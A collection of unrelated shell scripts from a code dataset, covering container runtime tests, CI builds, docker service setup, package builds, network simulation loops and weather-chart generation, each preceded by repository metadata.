tkn taskrun list -n kabanero
# End code block, line: 829
# New code block, line: 845
#tkn taskrun logs service-a-pipeline-run-v1-build-push-task-2tw5f -n kabanero
# End code block, line: 847
| true |
5e4d1ae730b1152eda5062ad596a5d757aaee9d5 | Shell | igamemedia/nvidia-container-runtime | /runtimeconfig/test/docker_test.sh | UTF-8 | 2,617 | 3.578125 | 4 | [
"BSD-3-Clause"
] | permissive | #! /bin/bash
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -euxo pipefail
shopt -s lastpipe
readonly basedir="$(dirname "$(realpath "$0")")"
readonly dind_name="nvidia-container-runtime-dind"
source "${basedir}/../src/common.sh"
testing::cleanup() {
docker run -it --privileged -v "${shared_dir}:/shared" alpine:latest chmod -R 777 /shared
rm -rf "${shared_dir}" || true
docker kill "${dind_name}" || true &> /dev/null
docker rm "${dind_name}" || true &> /dev/null
return
}
testing::setup() {
mkdir -p "${shared_dir}"
mkdir -p "${shared_dir}"/etc/docker
mkdir -p "${shared_dir}"/run/nvidia
mkdir -p "${shared_dir}"/etc/nvidia-container-runtime
}
testing::dind() {
# Docker creates /etc/docker when starting
# by default there isn't any config in this directory (even after the daemon starts)
docker run --privileged \
-v "${shared_dir}/etc/docker:/etc/docker" \
-v "${shared_dir}/run/nvidia:/run/nvidia:shared" \
--name "${dind_name}" -d docker:stable-dind -H unix://run/nvidia/docker.sock
}
testing::dind::alpine() {
docker exec -it "${dind_name}" sh -c "$*"
}
testing::toolkit() {
# Share the volumes so that we can edit the config file and point to the new runtime
# Share the pid so that we can ask docker to reload its config
docker run -it --privileged \
--volumes-from "${dind_name}" \
--pid "container:${dind_name}" \
"${tool_image}" \
bash -x -c "/work/run.sh /run/nvidia /run/nvidia/docker.sock $*"
}
testing::main() {
local -r tool_image="${1:-"nvidia/container-toolkit:docker19.03"}"
testing::setup
testing::dind
testing::toolkit --no-uninstall --no-daemon
# Ensure that we haven't broken non GPU containers
testing::dind::alpine docker run -it alpine echo foo
# Uninstall
testing::toolkit --no-daemon
testing::dind::alpine test ! -f /etc/docker/daemon.json
toolkit_files="$(ls -A "${shared_dir}"/run/nvidia/toolkit)"
test ! -z "${toolkit_files}"
testing::cleanup
}
readonly shared_dir="${1:-"./shared"}"
shift 1
trap testing::cleanup ERR
testing::cleanup
testing::main "$@"
| true |
a848fc762bc3aceccb9a2d182631ac7ffcd17286 | Shell | gimalon/docker-compose-elk | /logstash/run.sh | UTF-8 | 429 | 3.203125 | 3 | [] | no_license | #!/bin/bash
SERVER="elasticsearch:9200"
# wait for elastic search to boot up
while true; do
echo "-- Curling $SERVER to see if it is up already"
curl -s $SERVER
if [ $? -eq 0 ]; then
echo "-- Got curl connection! Done"
break
fi
# wait 5 more seconds
echo "-- not yet, waiting 5s"
sleep 5
done
# set -e
exec /opt/logstash-${LOGSTASH_VERSION}/bin/logstash -f /opt/logstash-${LOGSTASH_VERSION}/logstash.conf
| true |
bfe1ff84fb5ba7d86d74fc3b4dd4ad82b6a6b406 | Shell | blofse/atlassian-bitbucket | /initial_start_with_mysql.sh | UTF-8 | 892 | 3.40625 | 3 | [] | no_license | #!/bin/bash
if [[ $# -eq 0 ]] ; then
echo 'Expecting one argument'
exit 0
fi
docker network create \
--driver bridge \
atlassian-bitbucket-network
echo About to start bitbucket mysql container
docker run \
--name atlassian-bitbucket-database \
-e MYSQL_ROOT_PASSWORD="$1" \
-e MYSQL_DATABASE="bitbucket" \
-e MYSQL_USER="bitbucket" \
-e MYSQL_PASSWORD="$1" \
-v atlassian-bitbucket-database-data:/var/lib/mysql \
--net atlassian-bitbucket-network \
-d \
mysql:5.7 --character-set-server=utf8mb4 --collation-server=utf8mb4_unicode_ci
echo About to sleep to give the server time to start up
sleep 15
echo About to start bitbucket container
docker run \
--name atlassian-bitbucket \
-p 7990:7990 \
-p 7999:7999 \
-v atlassian-bitbucket-home:/var/atlassian/application-data/bitbucket \
--net atlassian-bitbucket-network \
-d \
atlassian-bitbucket
| true |
341fcce9c319481246460bafd339db18a8160929 | Shell | pcca-matrix/intensecoin | /ci/windows.10.x86.sh | UTF-8 | 1,150 | 3.484375 | 3 | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] | permissive | set -x
echo "CI: Windows 10 x86"
# FIXME: workaround for calling 32bit builds directly instead of environment detection
# determine build version
git describe --tags --exact-match 2> /dev/null
if [ $? -eq 0 ]; then
BUILD_VERSION=`git describe --tags --exact-match`
else
BUILD_BRANCH=`git rev-parse --abbrev-ref HEAD`
BUILD_COMMIT=`git rev-parse --short HEAD`
BUILD_VERSION="$BUILD_BRANCH-$BUILD_COMMIT"
fi
export BUILD_VERSION
echo "CI: Building static release..."
make -j2 release-static-win32
if [ $? -ne 0 ]; then
echo "CI: Build failed with error code: $?"
exit 1
fi
echo "CI: Creating release archive..."
RELEASE_NAME="intensecoin-cli-win-32bit-$BUILD_VERSION"
cd build/release/bin/
mkdir $RELEASE_NAME
cp intense-blockchain-export.exe $RELEASE_NAME/
cp intense-blockchain-import.exe $RELEASE_NAME/
cp intense-wallet-cli.exe $RELEASE_NAME/
cp intense-wallet-rpc.exe $RELEASE_NAME/
cp intensecoind.exe $RELEASE_NAME/
cp ../../../ci/package-artifacts/CHANGELOG.txt $RELEASE_NAME/
cp ../../../ci/package-artifacts/README.txt $RELEASE_NAME/
zip -rv $RELEASE_NAME.zip $RELEASE_NAME
sha256sum $RELEASE_NAME.zip > $RELEASE_NAME.zip.sha256.txt
| true |
107872c48b63450671c6241f649e2bdc6a2bffaf | Shell | RIVM-bioinformatics/wgs_identification | /scripts/clark_runall_snakemake.sh | UTF-8 | 591 | 2.9375 | 3 | [] | no_license | #!/bin/bash
# $1 = outputfile
# $2 = inputfile
#settings and directories
database=/mnt/db/wgs_identification/clark_db
targetfile=/mnt/db/wgs_identification/clark_db/targets.txt
inputfile=$1
outputfile=$2
monsternr=$3
threads=6
kmersize=21
mode=0
summarylogname="CLA_JOB_SUMMARY"
#runs CLARK for all R1 and R2 files in var "inputfile"
#creates i and j variable for the forward(R1) and reverse(R2) respectivly
R2File="R2"
i=$inputfile
j=${i/R1/$R2File}
#CLARK command
CLARK -n ${threads} -k ${kmersize} -T ${targetfile} -D ${database} -P ${i} ${j} -R cla_${monsternr}_out -m ${mode}
| true |
8d2cb64964d2751b87d7a0f96c48a904a08ac98f | Shell | alphagov/paas-cf | /scripts/create_buildpacks_email.sh | UTF-8 | 1,032 | 3.703125 | 4 | [
"MIT",
"LicenseRef-scancode-proprietary-license"
] | permissive | #!/usr/bin/env bash
set -e -u -o pipefail
echo "${0#$PWD}" >> ~/.paas-script-usage
MIN_GO_VERSION=1.11
GORAWVERSION=$(go version)
if [[ ${GORAWVERSION} =~ ([0-9]+\.[0-9]+(\.[0-9])?) ]]
then
if [ "$(echo -e "${MIN_GO_VERSION}\n${BASH_REMATCH[1]}" | sort -V | head -n 1)" != "${MIN_GO_VERSION}" ]
then
echo "at least go ${MIN_GO_VERSION} is required"
exit 1
fi
fi
cd "$(dirname "$0")/.."
root_dir="$(pwd)"
ARG=${1:-}
if [ "${ARG}" == "-h" ] || [ "${ARG}" == "--help" ]
then
echo -e "USAGE:\n ${0} [old commit sha to diff against / --help / -h]"
exit 0
elif [[ -n ${ARG} ]]
then
previous_commit="${ARG}"
else
previous_commit="$(git log --format=%H --max-count 1 --skip 1 -- "config/buildpacks.yml")"
fi
cd "${root_dir}/tools/buildpacks"
EMAIL_OUT="email-$(date "+%Y-%m-%d").txt"
go run email.go structs.go -old <(git show "$previous_commit:config/buildpacks.yml") -new <(git show "HEAD:config/buildpacks.yml") -out "${EMAIL_OUT}"
echo "Email content writen to: $(pwd)/${EMAIL_OUT}"
| true |
9f34300e4ed15486e6cf99e4b873c1413875eb32 | Shell | joelanford/declcfg-scripts | /lib/funcs.sh | UTF-8 | 4,700 | 3.578125 | 4 | [] | no_license | #!/usr/bin/env bash
getBundleFromImage() {
local configs=$1 image=$2
echo "${configs}" | yq e "select(.image==\"${image}\")" -
}
getPackage() {
local configs=$1 package=$2
echo "${configs}" | yq e "select(.schema==\"olm.package\" and .name==\"${package}\")" -
}
getBundle() {
local configs=$1 package=$2 bundleName=$3
echo "${configs}" | yq e "select(.schema==\"olm.bundle\" and .package==\"${package}\" and .name==\"${bundleName}\")" -
}
defaultChannelHead() {
local configs=$1 package=$2
channelHead "${configs}" "${package}" "$(defaultChannel "${configs}" "${package}")"
}
channelHead() {
local configs=$1 package=$2 channel=$3
sortChannel "${configs}" "${package}" "${channel}" | tac | head -1
}
defaultChannel() {
local configs=$1 package=$2
echo "${configs}" | yq eval-all "\
select(.schema==\"olm.package\" and .name==\"${package}\") | \
.defaultChannel \
" -
}
sortChannel() {
local configs=$1 package=$2 channel=$3
packageEdges "${configs}" "${package}" | yq e "\
.[] | select(.channel==\"${channel}\") | \
.from +\" \"+.to \
" - | tsort
}
packageEdges() {
local configs=$1 package=$2
echo "${configs}" | yq eval-all "\
select(.schema==\"olm.bundle\" and .package==\"${package}\") | \
{ \
\"channel\": .properties.[] | select(.type==\"olm.channel\") | .value.name, \
\"from\": .properties.[] | select(.type==\"olm.channel\") | .value.replaces, \
\"to\": .name \
} | \
select(.from != null) | [.] \
" -
}
getBundleChannels() {
local bundle=$1
echo "${bundle}" | yq e ".properties.[] | select(.type==\"olm.channel\") | .value.name" - | sort | uniq
}
ancestors() {
local configs=$1 package=$2 channel=$3 bundle=$4
sortChannel "${configs}" "${package}" "${channel}" | tac | sed -n "/^${bundle}$/,\$p" | sed 1d
}
descendents() {
local configs=$1 package=$2 channel=$3 bundle=$4
sortChannel "${configs}" "${package}" "${channel}" | sed -n "/^${bundle}$/,\$p" | sed 1d
}
removeBundles() {
local configs=$1 package=$2 bundles=$3
local bundleMatchers="" replaceMatchers=""
for b in ${bundles}; do
bundleMatchers="$bundleMatchers or .name == \"${b}\""
replaceMatchers="$replaceMatchers or .value.replaces == \"${b}\""
done
bundleMatchers="(${bundleMatchers#" or "})"
replaceMatchers="(${replaceMatchers#" or "})"
configs=$(echo "${configs}" | yq eval-all "[.] | del(.[] | select(.schema==\"olm.bundle\" and .package==\"${package}\" and ${bundleMatchers})) | .[] | splitDoc" -)
configs=$(echo "${configs}" | yq eval "del(.properties[] | select(.type == \"olm.channel\" and ${replaceMatchers}) | .value.replaces )" -)
echo "${configs}"
}
removeIfLatest() {
local configs=$1 bundle=$2
local bundlePackageName=$(echo "${bundle}" | yq e '.package' -)
local bundleName=$(echo "${bundle}" | yq e '.name' -)
for ch in $(getBundleChannels "${bundle}"); do
descs=$(descendents "${configs}" "${bundlePackageName}" "${ch}" "${bundleName}")
if [[ "$descs" != "" ]]; then
echo "Cannot overwrite \"${bundleName}\", it is not the head of channel \"${ch}\"" >&2
exit 1
fi
done
if [[ "${OVERWRITE_LATEST}" != "true" ]]; then
echo "Cannot overwrite \"${bundleName}\", OVERWRITE_LATEST must be set to \"true\"" >&2
exit 1
fi
removeBundles "${configs}" "${bundlePackageName}" "${bundleName}"
}
deprecateBundle() {
local configs=$1 package=$2 bundle=$3
echo "${configs}" | yq e "\
select( .schema == \"olm.bundle\" and .package == \"${package}\" and .name == \"${bundle}\").properties += [ \
{\"type\":\"olm.deprecated\", \"value\":{}}
] \
" -
}
fmt() {
local configsRef=$1 out=$2
local configs files
configs=$(opm alpha render "$configsRef" -o json)
files=$(echo "$configs" | jq --arg out "$out" -sc 'group_by(if .schema=="olm.package" then .name else .package end) | .[] | {filename: ($out + "/" + .[0].name + "/index.yaml"), blobs: . }')
echo "$files" | while read f; do
local filename blobs
filename=$(echo "$f" | jq -r '.filename')
blobs=$(echo "$f" | yq e -P '.blobs[] | splitDoc' -)
mkdir -p $(dirname $filename)
echo "$blobs" > "$filename"
done
}
debug() {
echo $@ >&2
}
#skips() {
# local configs=$1
# local package=$2
# local bundle=$3
#
# echo "${configs}" | yq eval-all "\
# select(.schema==\"olm.bundle\" and .package==\"${package}\" and .name==\"${bundle}\") | \
# .properties.[] | \
# select(.type==\"olm.skips\") | \
# .value \
# " -
#}
| true |
ed1efd7ce8dd3b7f3ecbe566cc531a9b11b169bc | Shell | couchbaselabs/sequoia | /containers/ycsb/run.sh | UTF-8 | 223 | 2.703125 | 3 | [] | no_license | #!/bin/bash
Url=$1
Site=http://$Url/query/service
while read line; do
sql=$line
echo curl -u Administrator:password -v $Site -d statement="$sql"
curl -u Administrator:password -v $Site -d statement="$sql"
done < $2 | true |
1a5e120f6d731920f300772a1fee8d54609f19d9 | Shell | jhub95/ocrscantools | /do_all.sh | UTF-8 | 642 | 3.546875 | 4 | [] | no_license | #!/bin/bash
DIR=$(dirname $0)
(
# Lock to make sure that only 1 process can run at the same time
flock -n 9 || exit 1
$DIR/sync_pi.sh
cd /depo/scans
for i in */; do
echo "About to process $i..."
cd $i
/home/bookscanner/scantools/convert_book.pl pdf text html #clean
if [ $? != 0 ]; then
echo "Command failed: $i"
fi
cd ..
done
$DIR/sync_pi.sh
# Human-readable output last
$DIR/check_undone_books.sh
) 9> /tmp/convert_book_lock
# Clean up lock file to allow other users to run the script
if [ "$?" = 0 ]; then
rm /tmp/convert_book_lock
fi
| true |
5a03bbad9524419b147ea22cd2047001820dcb79 | Shell | haroldTlan/cloud-beego | /python/Yan/storage/collect_diagnosis.sh | UTF-8 | 1,120 | 2.953125 | 3 | [] | no_license | #!/bin/bash
ZSTOR_PATH=/home/zonion
DIAGNOSIS_PATH=/home/zonion/diagnosis
rm -rf $DIAGNOSIS_PATH
mkdir $DIAGNOSIS_PATH
mysqldump -uspeedio -ppasswd speediodb > $DIAGNOSIS_PATH/speediodb.sql
bash /home/zonion/speedio/scripts/check_info.sh > /home/zonion/recent_info
logsize=`du -sm /var/log | awk '{print $1}'`
sda5size=`df -m | awk '{print $4}' | head -2 | tail -1`
size=`expr $sda5size / 2`
if [ $size -gt $logsize ];then
cp /var/log/core* $DIAGNOSIS_PATH
cp /var/log/syslog* $DIAGNOSIS_PATH
cp /var/log/kern* $DIAGNOSIS_PATH
cp /var/log/messages* $DIAGNOSIS_PATH
else
bash /home/zonion/speedio/scripts/dfck.sh 0
mv /var/logfile/* $DIAGNOSIS_PATH
fi
cp /var/log/boot.log $DIAGNOSIS_PATH
cp /var/log/authlog.worningip $DIAGNOSIS_PATH
cp /home/zonion/recent_info $DIAGNOSIS_PATH
cp /root/hardware_info $DIAGNOSIS_PATH
cp /var/log/speedio.* $DIAGNOSIS_PATH
cp $ZSTOR_PATH/license/key $DIAGNOSIS_PATH
cd $ZSTOR_PATH
d=`date +%Y-%m-%d_%H-%M`
n=`cat /root/hardware_info | grep 010100 | tail -1`
tar -czvf diagnosis.tar.gz diagnosis
rm -rf $DIAGNOSIS_PATH
| true |
a70b63d8282ab85f33ade4c18430a18b26cd0d64 | Shell | Bondzio/AUR | /mist/PKGBUILD | UTF-8 | 1,748 | 2.984375 | 3 | [] | no_license | # Maintainer: Andy Weidenbaum <archbaum@gmail.com>
pkgname=mist
pkgver=20150509
pkgrel=1
pkgdesc="Ether Browser for Ethereum"
arch=('i686' 'x86_64')
depends=('gmp'
'leveldb'
'qt5-base'
'qt5-declarative'
'qt5-quickcontrols'
'qt5-webengine'
'readline')
makedepends=('gcc'
'git'
'go'
'godep'
'make'
'mercurial')
optdepends=('go-ethereum: Ethereum Go developer client (CLI)')
groups=('ethereum')
url="https://github.com/ethereum/go-ethereum"
license=('GPL')
options=('!strip' '!emptydirs')
install=mist.install
pkgver() {
date +%Y%m%d
}
build() {
msg2 'Building...'
export GOPATH="$srcdir"
go get -d github.com/ethereum/go-ethereum/...
cd "$srcdir/src/github.com/ethereum/go-ethereum" && git checkout develop
godep restore
cd ./cmd/mist && go install
}
package() {
msg2 'Installing Mist assets...'
install -dm 755 "$pkgdir/usr/share/mist/src"
for _lib in `find "$srcdir/src" -mindepth 1 -maxdepth 1 -printf '%f\n'`; do
cp -dpr --no-preserve=ownership "$srcdir/src/$_lib" "$pkgdir/usr/share/mist/src/$_lib"
done
mv "$pkgdir/usr/share/mist/src/github.com/ethereum/go-ethereum/cmd/mist/assets"/* \
"$pkgdir/usr/share/mist" && rm -rf "$pkgdir/usr/share/mist/src"
msg2 'Installing Mist binary...'
for _bin in `find "$srcdir/bin" -mindepth 1 -maxdepth 1 -type f -printf '%f\n'`; do
install -Dm 755 "$srcdir/bin/$_bin" "$pkgdir/usr/bin/$_bin"
done
msg2 'Cleaning up pkgdir...'
find "$pkgdir" -type d -name .git -exec rm -r '{}' +
find "$pkgdir" -type f -name .gitignore -exec rm -r '{}' +
find "$pkgdir" -type d -name .hg -exec rm -r '{}' +
find "$pkgdir" -type f -name .hgignore -exec rm -r '{}' +
}
| true |
35565a35d48043e5ba20cf155e9d7283dda16252 | Shell | whlzdy/firmware | /OneCloud/script/server/control/funcs.sh | UTF-8 | 2,499 | 3.890625 | 4 | [] | no_license | #!/bin/bash
logpath="/opt/onecloud/script/server/log"
logfile="${logpath}/running.log"
maxsize=10485760
startstatusfile="/opt/onecloud/script/server/control/start_status.tmp"
stopstatusfile="/opt/onecloud/script/server/control/stop_status.tmp"
function checkConnection {
ip="${1}"
ping -q -c3 ${ip} > /dev/null 2>&1
echo "$?"
}
function checkIscsiConnection {
ip1="${1}"
#ip2="${2}"
#ping -q -c3 ${ip1} > /dev/null 2>&1
#result1=$?
#ping -q -c3 ${ip2} > /dev/null 2>&1
#resutl2=$?
#if [ "${result1}" -eq "0" ] && [ "${result2}" -eq "0" ]
#then
# echo "0"
#else
# log "CONNECT_ISCSI" "FAIL" "we have check iscsi and result is ${result1} and ${result2}!"
# echo "1"
#fi
out=`curl -m 5 http://${ip1}/v2/index.html`
result="$?"
if [ "${result}" -eq "0" ]
then
notfound=`echo ${out} | grep 404`
if [ -z "${notfound}" ]
then
echo "0"
else
echo "1"
fi
else
echo "${result}"
fi
}
function log {
# max size is 10M
size="$(stat --format=%s ${logfile})"
if [ "${size}" -gt "${maxsize}" ]
then
cp -f ${logfile} "${logpath}/running$(date +'%Y-%m-%d-%H-%M-%S').log"
rm -f ${logfile}
fi
echo "`date` ${1} ${2} ${3}" >> "${logfile}"
}
function checkAppStatus {
ip="${1}"
script="${2}"
state="${3}"
result=$(ssh -o ConnectTimeout=30 -o StrictHostKeyChecking=no clouder@${ip} "/bin/bash ${script} ${state}")
echo "$result"
}
function stopApp {
ip="${1}"
script="${2}"
ssh -o ConnectTimeout=30 -o StrictHostKeyChecking=no clouder@${ip} "/bin/bash ${script} > /dev/null 2>&1 &"
}
function startApp {
ip="${1}"
script="${2}"
ssh -o ConnectTimeout=30 -o StrictHostKeyChecking=no clouder@${ip} "/bin/bash ${script} > /dev/null 2>&1 &"
}
function shutdownSystemVm {
systemvmip="${1}"
ssh -o ConnectTimeout=30 -o StrictHostKeyChecking=no ${systemvmip} "shutdown -h now > /dev/null 2>&1 &"
}
function startWriteStatus {
echo "$(date +%s) ${1} ${2} ${3}" > ${startstatusfile}
}
function stopWriteStatus {
echo "$(date +%s) ${1} ${2} ${3}" > ${stopstatusfile}
}
function getType {
filename="${1}"
if [ "${filename}" == "firewall.property" ]
then
echo "2"
elif [ "${filename}" == "router.property" ]
then
echo "4"
elif [ "${filename}" == "storage.property" ]
then
echo "3"
elif [ "${filename}" == "switch.property" ]
then
echo "1"
elif [ "${filename}" == "ups.property" ]
then
echo "5"
else
echo "0"
fi
}
| true |
44de4917bfebf203620ae5ecf76d7ae2079fd9a4 | Shell | sjenning/run-monitor-chart | /show-chart.sh | UTF-8 | 232 | 2.875 | 3 | [] | no_license | #!/bin/bash
set -eux
if [ "$#" -ne 1 ]; then
echo "usage: $0 run-monitor-log-file"
exit 1
fi
go build .
./run-monitor-chart $1
python3 -m http.server &
PID=$!
trap "kill $PID" SIGINT SIGTERM
xdg-open "http://localhost:8000"
wait | true |
5f44d1d0a33c9a02ef189a62f7534c0e75020f70 | Shell | singi/QBDI | /docker/travis_linux/gtest.sh | UTF-8 | 1,120 | 3.5 | 4 | [
"Apache-2.0"
] | permissive | #!/usr/bin/bash
set -e
set -x
BASEDIR=$(cd $(dirname "$0") && pwd -P)
GITDIR=$(git rev-parse --show-toplevel)
if [[ -n "$(find "${GITDIR}/deps/gtest/${QBDI_PLATFORM}/lib" -type f -print -quit)" &&
-n "$(find "${GITDIR}/deps/gtest/${QBDI_PLATFORM}/include" -type f -print -quit)" ]]; then
exit 0;
fi
mkdir -p "${GITDIR}/deps/gtest/${QBDI_PLATFORM}/"
mkdir -p "${GITDIR}/deps/gtest/${QBDI_PLATFORM}/"
if [[ "linux-X86_64" = "${QBDI_PLATFORM}" ]]; then
docker build "${GITDIR}" -t qbdi_build:base -f "${BASEDIR}/base_X86_64.dockerfile"
elif [[ "linux-X86" = "${QBDI_PLATFORM}" ]]; then
docker build "${GITDIR}" -t qbdi_build:base -f "${BASEDIR}/base_X86.dockerfile"
else
echo "Unknown QBDI_PLATFORM : ${QBDI_PLATFORM}"
exit 1
fi
docker build "${GITDIR}" -t qbdi_build:gtest -f "${BASEDIR}/gtest.dockerfile"
docker create --name gtest qbdi_build:gtest
docker cp "gtest:/home/docker/qbdi/deps/gtest/${QBDI_PLATFORM}/include" "${GITDIR}/deps/gtest/${QBDI_PLATFORM}/"
docker cp "gtest:/home/docker/qbdi/deps/gtest/${QBDI_PLATFORM}/lib" "${GITDIR}/deps/gtest/${QBDI_PLATFORM}/"
docker rm gtest
| true |
6052ad2b3c46f396ebe5e41677a575328c06fe12 | Shell | ugoviti/izdock | /osync/filesystem/etc/runit/services/rsyncd/run | UTF-8 | 383 | 3.046875 | 3 | [] | no_license | #!/usr/bin/env sh
set -eu
exec 2>&1
#source /env
: ${cfgfile:="/etc/rsyncd.conf"}
RSYNC_OPTS=""
daemon=rsyncd
command="/usr/bin/rsync"
pidfile="/run/$daemon.pid"
# Check if command is executable or not
test -x ${command} || exit 0
#trap "pkill -SIGHUP runsvdir" SIGTERM SIGINT
echo "Starting '${command}' with PID: $$"
exec ${command} --daemon --no-detach --config=$cfgfile
| true |
b0777c8ea094a3ace301c0a0a1b32a0d3e82e978 | Shell | WarriorBeat/WarriorBeatApp | /fastlane/scripts/travis.sh | UTF-8 | 417 | 3.328125 | 3 | [] | no_license | #!/usr/bin/env bash
# Setup Travis CI
ENV_DIR=$1
ENV_MAIN="$ENV_DIR/.env"
ENV_DEV="$ENV_DIR/.env.dev"
ENV_STAGING="$ENV_DIR/.env.staging"
ENV_RELEASE="$ENV_DIR/.env.release"
ENVIRONS=($ENV_DEV $ENV_STAGING $ENV_RELEASE)
# Create Env Files
touch $ENV_MAIN
for file in "${ENVIRONS[@]}"; do
echo "export NODE_PATH=${NODE_PATH}" > $file
echo "export API_DEV=${API_DEV}" >> $file
cat $file
done
echo $NODE_PATH | true |
705fd19176b7930a9e20cd735e894ef6e7b7505b | Shell | juliapowen/IBICcode | /wrapper_qsub_submitEDItractography | UTF-8 | 554 | 2.921875 | 3 | [] | no_license | #!/bin/bash
rootdir=$1
filelist=$2
atlas=$3 #("" for DK, "a2009s" for DS, "fxcn" for FXCN)
bedpostdir=$4 #bedpostx_b1000
edge_list=$5
cd $rootdir
for subj in ` ls -d 10906* `
do
echo $subj
n=` ls $rootdir/$subj/session1/EDI/PBTKresults_EDI2/* | grep *.nii.gz | wc -l `
echo $n
nlines=` cat $edge_list | wc -l `
echo $nlines
if [ $n -lt $nlines ]
then
/mnt/home/jpowen/TractographyCode/IBICcode/qsub_submitEDItractography $rootdir allvols$atlas PBTKresults_EDI2 \
terminationmask$atlas.nii.gz bs.nii.gz $bedpostdir $subj $edge_list
fi
done
| true |
054273ba8f563d3ee5242d9f288ab8f5d56383ed | Shell | RandelSouza/Analise_New_Reno_Vegas_Veno | /repos/ns-3-allinone/ns-3-dev/scratch/topology_halteres/halteres.sh | UTF-8 | 1,192 | 3.265625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# Protocolo TCP utilizado 1(New Reno), 2(Vegas) e 3(Veno)
typeTCP=( 1 2 3 )
# Taxa de erro utilizada
errorRate=( 0.2 0.5 )
# Número de nós presente na topologia de rede halteres
numberNodes=( 9 36 64 )
# Taxa de trasmissão in Mbps
dataRate=( 10 100 )
NS_LOG=halteres=info
for tcp in "${typeTCP[@]}"
do
for error in "${errorRate[@]}"
do
for node in "${numberNodes[@]}"
do
for rate in "${dataRate[@]}"
do
echo $tcp, $error, $node, $rate;
nodesQuantity=$[$node * $node];
nodesQuantity=$[$nodesQuantity / 2];
./../../waf --run "halteres --typeTCP="$tcp" --errorRate="$error" --nLeftLeaf="$nodesQuantity" --nRightLeaf="$nodesQuantity" --dataRate="$rate"";
mkdir -p halteres-$tcp-$error-$nodesQuantity-$rate;
mkdir -p halteres-$tcp-$error-$nodesQuantity-$rate-xml;
mkdir -p halteres-$tcp-$error-$nodesQuantity-$rate-tr;
mv ../../*.pcap halteres-$tcp-$error-$nodesQuantity-$rate;
mv ../../*.tr halteres-$tcp-$error-$nodesQuantity-$rate-tr;
mv ../../*.xml halteres-$tcp-$error-$nodesQuantity-$rate-xml;
done
done
done
done
| true |
d8f9d3a62f4002703cf88048c97e2bfeb60b43c7 | Shell | jmyounker/dot.files | /bin/tf-apply | UTF-8 | 403 | 3.65625 | 4 | [] | no_license | #!/usr/bin/env bash
TF_PLAN_DIR="${PWD}/.plans"
if [ ! -e "${TF_PLAN_DIR}" ]; then
echo "no plans available" >&2
exit 1
fi
PLAN=$(ls "${TF_PLAN_DIR}" | sort | tail -1)
PLAN_LEN=$( echo -n $PLAN | wc -c | awk '{print $1}' )
if [ "$PLAN_LEN" == "0" ]; then
echo "no plans available" >&2
exit 1
fi
echo "executing plan '$TF_PLAN_DIR/$PLAN'" >&2
exec terraform apply "$TF_PLAN_DIR/$PLAN" "$@"
| true |
f9971a5f948af8dd259295cdc4b8b91632ab5734 | Shell | lgannoaa/global-workflow | /gempak/ush/gempak_gfs_f00_gif.sh | UTF-8 | 11,629 | 2.90625 | 3 | [] | no_license | #!/bin/sh
#########################################################################
#
# Script: gempak_gfs_f00_gif.sh
#
# This scripts creates GEMPAK .gif images of 00HR/Analysis fields from
# GFS model output for archiving at NCDC.
#
#
# History: Ralph Jones 02/16/2005 JIF original version.
# History: Steve Lilly 04/30/2008 Change font size of the Titles
# from .8 to a larger size (1 or 2)
#
#
#########################################################################
msg=" Make GEMPAK GIFS utility"
postmsg "$jlogfile" "$msg"
set -x
MAPAREA="normal"
LATVAL="1/1/1/1/5;5"
pixels="1728;1472"
cp $FIXgempak/coltbl.spc coltbl.xwp
#################################################################
# ANALYSIS CHARTS #
#################################################################
# Create time stamp (bottom) label
echo 0000${PDY}${cyc} > dates
export FORT55="title.output"
# $WEBTITLE < dates
${UTILgfs}/exec/webtitle < dates
export TITLE=`cat title.output`
echo "\n\n TITLE = $TITLE \n"
# Define labels and file names for analysis charts
hgttmp700lab="700MB ANALYSIS HEIGHTS/TEMPERATURE"
hgttmp700dev="gfs_700_hgt_tmp_nh_anl_${cyc}.gif"
hgttmp500lab="500MB ANALYSIS HEIGHTS/TEMPERATURE"
hgttmp500dev="gfs_500_hgt_tmp_nh_anl_${cyc}.gif"
hgtiso500lab="500MB ANALYSIS HEIGHTS/ISOTACHS"
hgtiso500dev="gfs_500_hgt_iso_nh_anl_${cyc}.gif"
hgtiso300lab="300MB ANALYSIS HEIGHTS/ISOTACHS"
hgtiso300dev="gfs_300_hgt_iso_nh_anl_${cyc}.gif"
hgtiso250lab="250MB ANALYSIS HEIGHTS/ISOTACHS"
hgtiso250dev="gfs_250_hgt_iso_nh_anl_${cyc}.gif"
hgttmp250lab="250MB ANALYSIS HEIGHTS/TEMPERATURE"
hgttmp250dev="gfs_250_hgt_tmp_nh_anl_${cyc}.gif"
hgtiso200lab="200MB ANALYSIS HEIGHTS/ISOTACHS"
hgtiso200dev="gfs_200_hgt_iso_nh_anl_${cyc}.gif"
hgttmp200lab="200MB ANALYSIS HEIGHTS/TEMPERATURE"
hgttmp200dev="gfs_200_hgt_tmp_nh_anl_${cyc}.gif"
hgtiso100lab="100MB ANALYSIS HEIGHTS/ISOTACHS"
hgtiso100dev="gfs_100_hgt_iso_nh_anl_${cyc}.gif"
hgttmp100lab="100MB ANALYSIS HEIGHTS/TEMPERATURE"
hgttmp100dev="gfs_100_hgt_tmp_nh_anl_${cyc}.gif"
hgtvor500lab="500MB ANALYSIS HEIGHTS/VORTICITY"
hgtvor500dev="gfs_500_hgt_vor_nh_anl_${cyc}.gif"
hgtvor500usdev="gfs_500_hgt_vor_uscan_anl_${cyc}.gif"
mslpthksfclab="ANALYSIS MEAN SEA LEVEL PRESSURE/1000-500MB THICKNESS"
mslpthksfcdev="gfs_sfc_mslp_thk_nh_anl_${cyc}.gif"
mslpthksfcusdev="gfs_sfc_mslp_thk_uscan_anl_${cyc}.gif"
rhvvel700lab="700MB ANALYSIS RH/VERT VEL"
rhvvel700dev="gfs_700_rh_vvel_nh_anl_${cyc}.gif"
liftlab="ANALYSIS LIFTED INDEX"
liftdev="gfs_lift_nh_anl_${cyc}.gif"
prswshtroplab="TROPOPAUSE PRESSURE/WIND SHEAR"
prswshtropdev="gfs_trop_prs_wsh_nh_anl_${cyc}.gif"
# Set grid date and input file name
gdattim=`echo ${PDY} | cut -c3-8`/${cyc}00F000
gdfile=gem_grids${fhr}.gem
